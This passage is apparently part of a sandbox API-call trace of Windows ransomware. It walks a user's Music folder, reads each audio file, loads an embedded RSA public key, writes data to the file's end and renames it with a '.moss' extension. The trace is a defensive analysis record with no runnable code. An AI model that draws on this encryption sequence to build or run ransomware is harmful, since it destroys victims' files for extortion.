hHeap=0xcd0000) returned 1 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.633] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.634] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.634] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.634] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.634] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.634] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.634] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\") returned="lf_1AfflQryz8itj s8w\\" [0171.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0171.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.634] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.634] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.634] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.634] PathFindFileNameW (pszPath="") returned="" [0171.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0xc6bc6380, ftLastAccessTime.dwHighDateTime=0x1d5e707, ftLastWriteTime.dwLowDateTime=0xc6bc6380, ftLastWriteTime.dwHighDateTime=0x1d5e707, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.635] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.635] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0xc6bc6380, ftLastAccessTime.dwHighDateTime=0x1d5e707, ftLastWriteTime.dwLowDateTime=0xc6bc6380, ftLastWriteTime.dwHighDateTime=0x1d5e707, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.635] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e502e70, ftCreationTime.dwHighDateTime=0x1d5dcac, ftLastAccessTime.dwLowDateTime=0x825b3b30, ftLastAccessTime.dwHighDateTime=0x1d5e68a, ftLastWriteTime.dwLowDateTime=0x825b3b30, ftLastWriteTime.dwHighDateTime=0x1d5e68a, nFileSizeHigh=0x0, nFileSizeLow=0x7f90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2NB5BXl v7m2B-rvdN.wav", cAlternateFileName="2NB5BX~1.WAV")) returned 1 [0171.635] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\2NB5BXl v7m2B-rvdN.wav") returned=".wav" [0171.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\2NB5BXl v7m2B-rvdN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\2nb5bxl v7m2b-rvdn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.635] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=32656) returned 1 [0171.635] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.639] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7f6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.639] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.640] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7f90, lpOverlapped=0x0) returned 1 [0171.640] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.641] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.642] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.642] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.642] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.642] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.642] GetLastError () returned 0x0 [0171.642] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.642] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.642] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.642] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.642] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.642] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.643] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.643] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.644] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\2NB5BXl v7m2B-rvdN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\2nb5bxl v7m2b-rvdn.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\2NB5BXl v7m2B-rvdN.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\2nb5bxl v7m2b-rvdn.wav.moss")) returned 1 [0171.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.645] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.646] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d71260, ftCreationTime.dwHighDateTime=0x1d5dfdd, ftLastAccessTime.dwLowDateTime=0xd8b96970, ftLastAccessTime.dwHighDateTime=0x1d5dd11, ftLastWriteTime.dwLowDateTime=0xd8b96970, ftLastWriteTime.dwHighDateTime=0x1d5dd11, nFileSizeHigh=0x0, nFileSizeLow=0x15eb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OtPN87Pig3y.wav", cAlternateFileName="OTPN87~1.WAV")) returned 1 [0171.646] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\OtPN87Pig3y.wav") returned=".wav" [0171.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\OtPN87Pig3y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\otpn87pig3y.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.647] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=89778) returned 1 [0171.647] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.652] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15e8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.652] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.652] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x15eb2, lpOverlapped=0x0) returned 1 [0171.652] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.653] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.654] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.654] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.654] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.654] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.654] GetLastError () returned 0x0 [0171.654] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.654] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.654] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.654] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.654] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.654] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.655] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.655] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15eb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.656] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.656] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.656] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\OtPN87Pig3y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\otpn87pig3y.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\OtPN87Pig3y.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\otpn87pig3y.wav.moss")) returned 1 [0171.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.657] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.657] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.658] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.658] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fcc2a0, ftCreationTime.dwHighDateTime=0x1d5da41, ftLastAccessTime.dwLowDateTime=0x2fb8e6d0, ftLastAccessTime.dwHighDateTime=0x1d5dec8, ftLastWriteTime.dwLowDateTime=0x2fb8e6d0, ftLastWriteTime.dwHighDateTime=0x1d5dec8, nFileSizeHigh=0x0, nFileSizeLow=0x10b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v_kH3lt3CLNkfkofloR.mp3", cAlternateFileName="V_KH3L~1.MP3")) returned 1 [0171.659] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\v_kH3lt3CLNkfkofloR.mp3") returned=".mp3" [0171.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\v_kH3lt3CLNkfkofloR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\v_kh3lt3clnkfkoflor.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.659] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=68509) returned 1 [0171.659] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.662] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10b77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.662] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.663] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x10b9d, lpOverlapped=0x0) returned 1 [0171.664] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.664] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0171.665] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.665] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.665] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.666] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.666] GetLastError () returned 0x0 [0171.666] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.666] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0171.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.666] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.666] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.666] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.666] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.666] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.667] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10b9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.667] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.667] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.668] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\v_kH3lt3CLNkfkofloR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\v_kh3lt3clnkfkoflor.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\v_kH3lt3CLNkfkofloR.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lf_1afflqryz8itj s8w\\v_kh3lt3clnkfkoflor.mp3.moss")) returned 1 [0171.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.668] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.668] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.670] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fcc2a0, ftCreationTime.dwHighDateTime=0x1d5da41, ftLastAccessTime.dwLowDateTime=0x2fb8e6d0, ftLastAccessTime.dwHighDateTime=0x1d5dec8, 